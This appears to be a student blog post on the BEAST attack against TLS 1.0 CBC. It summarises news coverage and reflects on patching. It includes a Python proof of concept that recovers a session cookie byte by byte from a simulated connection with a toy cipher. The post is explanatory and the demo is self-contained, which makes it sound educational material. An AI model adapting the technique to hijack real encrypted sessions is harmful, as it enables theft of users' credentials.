Sean Gallagher's article on the Ars Technica web site reported that a hacking tool, dubbed BEAST, has been developed which decrypts secure Web requests to sites using the Transport Layer Security 1.0 protocol and SSL 3.0, allowing a person or program to hijack sessions with financial websites and other services.
It is a man-in-the-middle approach: the attacker injects chosen plain text into the target browser's encrypted request stream and compares the resulting ciphertext with the ciphertext of the secret data already in that stream (such as the session cookie), recovering that data one byte at a time. The shared key itself is never recovered; what makes the comparison possible is that TLS 1.0 in CBC mode uses the last ciphertext block of the previous record as the IV for the next record, so the IV is predictable to anyone watching the wire. The code can be injected into the user's browser through JavaScript associated with a malicious advertisement distributed through a Web ad service, or through an IFRAME in a linkjacked site, ad, or other scripted element on a webpage. http://arstechnica.com/business/news/2011/09/new-javascript-hacking-tool-can-intercept-paypal-other-secure-sessions.ars
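The following Python is an added illustration of the CBC weakness described above; it is not code from the Ars Technica article or from the BEAST authors. It models a TLS 1.0 CBC sender whose IV for each record is the last ciphertext block of the previous record, a victim browser that sends attacker-chosen bytes followed by a secret cookie (the attacker controls the bytes in front of the cookie, as a script controls the request path), and an attacker who recovers the cookie one byte at a time by the blockwise chosen-boundary method. A small Feistel cipher built on SHA-256 stands in for AES so the example runs with only the standard library; the attack does not depend on the cipher, only on the chained IV. The key, IV, cookie value and class names are constructed for the demo.

```python
import hashlib

BLOCK = 16  # block size in bytes, the same as AES


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    """Feistel round function: a keyed hash truncated to half a block."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def encrypt_block(key: bytes, block: bytes) -> bytes:
    """Toy 128-bit Feistel block cipher (8 rounds). A stand-in for AES: it is a
    keyed permutation, which is all the attack below relies on."""
    assert len(block) == BLOCK
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(8):
        left, right = right, xor(left, _round(key, rnd, right))
    return left + right


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pad(data: bytes) -> bytes:
    """Pad to whole blocks (PKCS#7 style: each padding byte holds the count)."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


class Tls10Sender:
    """CBC as TLS 1.0 chains it: the IV of each record is the last ciphertext
    block of the previous record, so an observer knows the next IV in advance."""

    def __init__(self, key: bytes, iv: bytes):
        self.key = key
        self.chain = iv  # handshake IV at first, then the last ciphertext block

    def send_record(self, plaintext: bytes) -> bytes:
        padded = pad(plaintext)
        ct = b""
        for i in range(0, len(padded), BLOCK):
            self.chain = encrypt_block(self.key, xor(padded[i:i + BLOCK], self.chain))
            ct += self.chain
        return ct


class VictimBrowser:
    """The target browser: attacker script can make it send requests on the
    same TLS connection, but the cookie is appended by the browser and never
    exposed to the script."""

    def __init__(self, key: bytes, iv: bytes, cookie: bytes):
        self.tls = Tls10Sender(key, iv)
        self.cookie = cookie

    def request(self, path: bytes) -> bytes:
        """Attacker-chosen bytes followed by the secret cookie (constructed model)."""
        return self.tls.send_record(path + self.cookie)

    def inject(self, data: bytes) -> bytes:
        """Fully attacker-controlled plaintext on the same connection."""
        return self.tls.send_record(data)


def beast_recover(victim: VictimBrowser, cookie_len: int) -> bytes:
    """Blockwise chosen-boundary attack: align each unknown cookie byte at the
    end of a block, then test 256 guesses with chosen plaintext blocks."""
    last = victim.inject(b"warm-up")[-BLOCK:]  # observe one record: next IV is now known
    known = b""
    for n in range(cookie_len):
        prefix = b"A" * ((-(n + 1)) % BLOCK)  # puts cookie[n] as the last byte of a block
        ct = victim.request(prefix)
        t = (len(prefix) + n + 1) // BLOCK - 1  # index of the block holding cookie[n]
        c_prev = last if t == 0 else ct[(t - 1) * BLOCK:t * BLOCK]
        c_target = ct[t * BLOCK:(t + 1) * BLOCK]
        last = ct[-BLOCK:]
        known_part = (prefix + known)[t * BLOCK:]  # the 15 known bytes of that block
        for g in range(256):
            guess = known_part + bytes([g])
            # Sender computes E(x XOR last); choose x so this equals E(c_prev XOR guess),
            # which matches c_target exactly when guess is the real plaintext block.
            probe = victim.inject(xor(xor(c_prev, last), guess))
            last = probe[-BLOCK:]
            if probe[:BLOCK] == c_target:
                known += bytes([g])
                break
        else:
            raise RuntimeError("no guess matched; model out of sync")
    return known


def demo() -> bytes:
    """Run the attack against a constructed key, IV and cookie."""
    key = hashlib.sha256(b"constructed demo key").digest()[:BLOCK]
    victim = VictimBrowser(key, b"\x00" * BLOCK, b"SID=7f3a9c")
    return beast_recover(victim, 10)


if __name__ == "__main__":
    print(demo())  # recovers b'SID=7f3a9c' without ever learning the key
```

Each cookie byte costs at most 256 chosen records, which is why the attack is slow in practice but still finishes; the fix in TLS 1.1 and later is an explicit, unpredictable IV per record, which breaks the equality the probe relies on.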
In its current iteration, BEAST would require at least a half-hour to decrypt requests. If your average transaction is only a few minutes, is this vulnerability something that should receive immediate attention? I suppose this is just the price we all have to pay for the convenience of utilizing services that companies like PayPal give us.
Looking through my settings for IE9 shows TLS 1.1 and 1.2 disabled by default. I've read in other comments on this article that enabling these will not make a difference if the server you are connected to only supports TLS 1.0. It is unclear whether implementing the new standards will prevent this attack.
This goes back to what has been drilled into my head since starting my degree concentration: staying current on patch management and on current security threats. Maybe receiving this kind of attention is what this needs. It will force the adoption of the newer standards to plug holes that were previously treated as accepted risk. If the customer doesn't feel secure, will they continue to use your service? It is all about the money, isn't it?